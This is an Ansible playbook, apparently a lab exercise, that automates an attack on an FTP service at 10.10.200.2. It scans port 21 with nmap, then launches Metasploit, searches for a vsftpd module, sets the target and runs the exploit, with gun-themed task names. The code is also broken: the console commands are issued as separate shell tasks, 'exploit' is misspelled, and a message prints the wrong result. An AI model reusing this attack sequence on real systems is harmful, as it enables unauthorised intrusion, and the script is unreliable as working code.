---
- name: BASIC FTP ATTACK
  hosts: thx_kali
  become: yes
  gather_facts: no
  tasks:
    - name: CHECKING SERVICE STATUS
      shell: nmap -sV -p21 -sC -A 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: SUCCESS
      block:
        - name: Print command 1 success output
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr }}"
        - name: STOPPED
          fail:
            msg: "Stopping playbook due to command 1 failure."

    - name: METAPLOT CONSOLE STARTING
      shell: msfconsole
      register: result2
      ignore_errors: yes

    - name: SUCCESS
      block:
        - name: Print command 2 success output
          debug:
            msg: "ITS STARTED LETS GO MAN: {{ result2.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result2.stderr }}"

    - name: WOW THE GUNS
      shell: search vsftp
      register: result3
      ignore_errors: yes

    - name: CHECKING THE FTP GUN
      block:
        - name: SUCCESS
          debug:
            msg: "GUN ARE HERE LETS GO MAN: {{ result3.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result3.stderr }}"

    - name: BULLETS CHECK
      shell: use 0
      register: result4
      ignore_errors: yes

    - name: SELECT BULLET
      block:
        - name: SUCCESS
          debug:
            msg: "BULLET IN LETS GO MAN: {{ result4.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result4.stderr }}"

    - name: AIMING TO SHOOT
      shell: set RHOST 10.10.200.2
      register: result5
      ignore_errors: yes

    - name: SELECT TARGET
      block:
        - name: SUCCESS
          debug:
            msg: "IN TARGET LETS GO MAN: {{ result5.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result5.stderr }}"

    - name: SHOOT
      shell: explot
      register: result6
      ignore_errors: yes

    - name: SHOOTING SHOOTING
      block:
        - name: SUCCESS
          debug:
            msg: "SHOOTS FIRED LETS GO MAN: {{ result6.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result6.stderr }}"
      
    - name: MAN DOWN
      shell: poweroff
      register: result7
      ignore_errors: yes

    - name: MAN DOWN MAN DOWN
      block:
        - name: SUCCESS
          debug:
            msg: "AFFUDDE: {{ result3.stdout }}"
      rescue:
        - name: HALT
          debug:
            msg: "OKAY !! NO WAY: {{ result7.stderr }}"

    # Add more tasks as needed following the same pattern
